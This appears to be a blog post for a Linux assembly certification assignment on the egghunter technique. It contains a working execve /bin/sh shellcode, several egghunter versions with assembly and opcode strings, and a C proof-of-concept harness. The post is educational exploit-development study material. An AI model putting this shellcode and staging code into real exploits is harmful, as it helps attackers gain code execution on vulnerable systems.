Introduction

This post is dedicated to the 3rd assignment of the SLAE certification exam. I prioritized this assignment because it was the only one that touched upon the subject not covered in the course.

The most often cited paper on egghunter technique to date is Matt Miller's (aka skape) "Safely Searching Process Virtual Address Space". To not deviate from the established tradition I will use that paper as the main reference too.

The whole technique is about staging exploitation in two steps in cases when you have insufficient space to fit an entire payload in the place where you have gained execution control. It works similar to staged Metasploit payloads: the first payload (stager) exploits vulnerability, takes control of the execution and downloads the second part (stage) - the fully-fledged and feature-reach payload (e.g. Meterpreter). In case of the egghunter, the egg-searching code is a stager that is used to find a unique marker, the egg, and pass execution to the stage, the main payload, following the egg.

One important condition for using the egghunter technique is that besides exploiting a vulnerability that provides you with an opportunity for injecting the egghunter staging code, you must be able to somehow feed the vulnerable application your main payload such that it is stored somewhere in the application's memory.

The egg

The size of the shellcode recommended by Matt is 8 bytes. The reason cited is that implementations for the egg hunting algorithms tend to have four-byte versions of the egg stored once in the searching code itself, thus making it possible to accidentally run into the egg hunter itself instead of the expected payload, if one were to use a four byte version of the egg. In the text below we will see how this issue can be overcome, at the same time reducing the egghunter size.

Depending on the egghunter logic an egg may be required to consist of executable instructions. That is the egg must be executable if egghunter passes execution to the egg itself and it doesn't have to be executable when the egghunter skips the egg and passes execution to the payload. Note that I didn't say that your egg can be comprised of anything you want in the second case. Remember that the egg pattern must be as uncommon as possible. For example, it is not uncommon to encounter or ax, 0xffff instruction which translates to \x66\x83\xC8\xFF opcode sequence. And if you choose this sequence as your egg, there is a high possibility that the egghunter will stumble upon this sequence elsewhere in the process memory and transfer execution to the wrong place. So you should be careful when you choose your egg pattern, especially if it shorter than 8 bytes.

To satisfy the requirement of executable egg pattern, instructions that don't change the logic of the execution flow are usually used. Vivek Ramachandran, the SLAE course instructor, calls them nop-equivalents. For example, the following 1-byte instructions can be mixed to create an executable egg pattern: nop, push/pop r32, inc/dec r32, pushad/popad, pushfd, push/pop cs/ds/ss/es, xchg eax, r32, etc.

Analyzing egghunter source code

First we will create a simple shellcode to work with. The shellcode launches the /bin/sh shell using execve system call. Follows the source code and the command used to build the binary:

section .text
    global _start

_start:
    xor eax, eax    ; We need some nulls to delimit arguments on the stack
    push eax        ; Push the first delimeter: null terminator for the string
    push 0x68732f6e ; Push the string with a program name to launch
    push 0x69622f2f
    mov ebx, esp    ; 1st param: pointer to the string of the program to launch
    push eax        ; Push nulls on the stack to terminate array of string pointers
    push ebx        ; Push pointer to string pointer thus creating array of string 
                    ; pointers
    mov ecx, esp    ; 2nd param: pointer to array of string pointers (args)
    xor edx, edx    ; 3rd param: env vars. Null here works fine.
    mov al, 11      ; execve syscall
    int 80h

nasm -f elf stacksh.asm && ld stacksh.o -o stacksh

Making sure the payload works

In our next step we extract the shellcode string from the code section of the binary using scdump helper script I created while going through the SLAE course:

Extracting shellcode

The extracted shellcode string: \x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

Next, I will use the second Linux egghunter shellcode found in the aforementioned paper, fix it, explain how it works and make some modifications to reduce its size.

Here is the initial egghunter source with my comments:

_start:
    xor edx, edx        ; Begin from the lowest memory address, which is 0
.nextpage:
    or dx, 0xfff        ; This and the next instruction combined add 0x1000 (4096)
                        ; to the edx register; this is the size of memory page
.nextbyte:
    inc edx             ; Either compliment the previous instruction and go to ...
                        ; ... the next page or go to the next byte
    lea ebx, [edx+0x4]  ; Load the next after the current dword into ebx
    push byte 0x21      ; This and the next instruction load the access ...
    pop eax             ; ... syscall code into the eax
    int 80h             ; Tell kernel to do the syscall
    cmp al, 0xf2        ; See if syscall returned EFAULT error meaning that we ...
    jz .nextpage        ; ... landed on unallocated memory page and should skip it
    mov eax, 0x50905090 ; If we landed on the correct memory address, load the ...
                        ; ... eax with our egg to compare
    mov edi, edx        ; Check if the first dword in the 8 byte sequence ...
    scasd               ; ... matches the egg
    jnz .nextbyte       ; Continue to the next byte if does not match, or ...
    scasd               ; ... if it matches check the next second dword
    jnz .nextbyte       ; Continue to the next byte if 2nd dword does not match
    jmp edi             ; The egg is found! Pass control to the main payload

The egghunter searches for an 8 byte doubled-egg - \x90\x50\x90\x50\x90\x50\x90\x50. That's why it checks for matching dword 0x50905090 two times.

The following instruction sequence

or dx, 0xfff
inc edx

is equivalent to

mov edx, 0x1000

But because of the smart trick employed by the original shellcode author to reduce the code size, the second part of the sequence is actually "reused" for traversing bytes inside of a valid memory page.

In the following instruction

lea ebx, [edx+0x4]

value 0x4 is added to the address held in EDX because it allows eight bytes of contiguous memory to be validated in a single swoop. The reason that it works in all cases is because the implementation will increment by page size when it encounters invalid addresses, thus it’s impossible that EDX+0x4 could be valid and EDX itself not.

To traverse through memory the implementation relies on the access system call (0x21) that checks whether the calling process can access the file at the specified pathname. But its main functionality is not used in this case. The implementation actually uses the side effect of the function: when it tries to access the pathname string by its address loaded in EBX it returns an EFAULT error meaning that pathname points outside of process's accessible address space. So when we get the EFAULT error code returned in EAX we may conclude that EBX points to unmapped inaccessible memory and hence we can safely skip the current page and check the next one.

The EFAULT constant is defined as equal to 14 (0xe). But when this error occurs the kernel actually returns its value negated: -EFAULT = -0xe = 0xffffffff-0xe = 0xfffffff2. That's why the following part of the code

cmp al, 0xf2

checks if AL (lowest 8 bits of EAX register) contains 0xf2.

Fixing the bug

The access function signature can be found in Linux manual pages by running man 2 access command:

int access(const char *pathname, int mode);
…
ERRORS
        access() shall fail if:
        …
        EFAULT pathname points outside your accessible address space.
        EINVAL mode was incorrectly specified.
        …

Note that it actually takes 2 parameters. And that was the reason the reference implementation did not work for me. Most likely Linux developers have changed internal implementation of the access function from the time skape wrote his paper.

Following Linux syscall convention the 1^st syscall argument goes into EBX register, 2^nd into ECX, 3^rd into EDX, etc. The correct values for the second argument that must be put into ECX, according to the man page and /usr/include/unistd.h file, can be a value of 0 through 7. And when it is not the case the function, instead of EFAULT, returns the EINVAL error and the whole construction collapses resulting in a segfault. To fix the issue I had to insert

xor ecx, ecx

right before int 80h instruction, effectively setting the second argument for the access function to be 0, which is a valid value.

Now, after the egghunter is fixed we can build a binary out of it and extract the payload:

nasm -f elf egghunter2.asm && ld egghunter2.o -o egghunter2
scdump egghunter2

Output (formatted to fit the screen):

Length: 37
Payload: "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd"
"\x80\x3c\xf2\x74\xec\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"

Note that original shellcode length (35 bytes) increased by 2 bytes because of the applied fix.

After inserting the egghunter and our earlier generated payload into a C source code and compiling it we get a working PoC:

gcc scframe.c -fno-stack-protector -z execstack -o scframe && ./scframe

Working egghunter PoC

Contents of the scframe.c:

#include <stdio.h>
#include <string.h>

unsigned char egghunter[] =  
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c"
"\xf2\x74\xec\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7";

unsigned char shellcode[] = 
"\x90\x50\x90\x50\x90\x50\x90\x50"  // EGG
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" // SHELLCODE
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Egghunter length: %d\n", strlen(egghunter));
    printf("Shellcode length: %d\n", strlen(shellcode));

    (*(void(*)(void))egghunter)();

    return 0;
}

Reducing the size

Trying to reduce the size of the shellcode I looked at other Linux syscalls hoping to find one whose side effect I could use in a similar manner and which took only one pointer argument. And I found one - chdir.

The only argument the function takes is the pointer to a string containing path. It is not as good as the access function and in the worst case scenario, if it encounters a valid directory path in the process memory you will end up running in some random directory. On the positive side using this system call we can claim back the added bytes by removing the xor ecx, ecx instruction. The changed part of the egghunter:

    push byte 0xc   ; chdir syscall # 
    pop eax
    int 80h

After re-building the egghunter, extracting the shellcode with scdump, inserting it into our C program and, finally, building it we get another working sample which is 35 bytes long:

Egghunter with replaced system call

Next, to win us a couple more bytes we can use 4 bytes long egg and modify the algorithm. To solve the problem of storing the same egg pattern with the egghunter algo we can simply modify the egg after loading it into EAX register and then prepend the modified version to the main payload. This change eliminates check for the second dword of 8-byte long egg. The modified code follows:

section .text
    global _start

_start:
    xor edx, edx
.nextpage:
    or dx, 0xfff
.nextbyte:
    inc edx
    lea ebx, [edx]
    push byte 0xc        ; chdir syscall
    pop eax
    int 80h
    cmp al, 0xf2
    jz .nextpage
    mov eax, 0x50905090
    inc eax
    mov edi, edx
    scasd
    jnz .nextbyte
    jmp edi

Note how we need to change the egg in front of our main payload in the C program. The first byte is now \x91:

unsigned char shellcode[] = 
"\x91\x50\x90\x50"  // EGG
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" // SHELLCODE
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

Building and running C program with updated egghunter and egg we get the working result with 32-bytes long egghunter:

Final egghunter version, 32 bytes long

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.

Oleg's Web Log

Staging payload using Egghunter technique (SLAE, Assignment #3)

Introduction

The egg

Analyzing egghunter source code

Fixing the bug

Reducing the size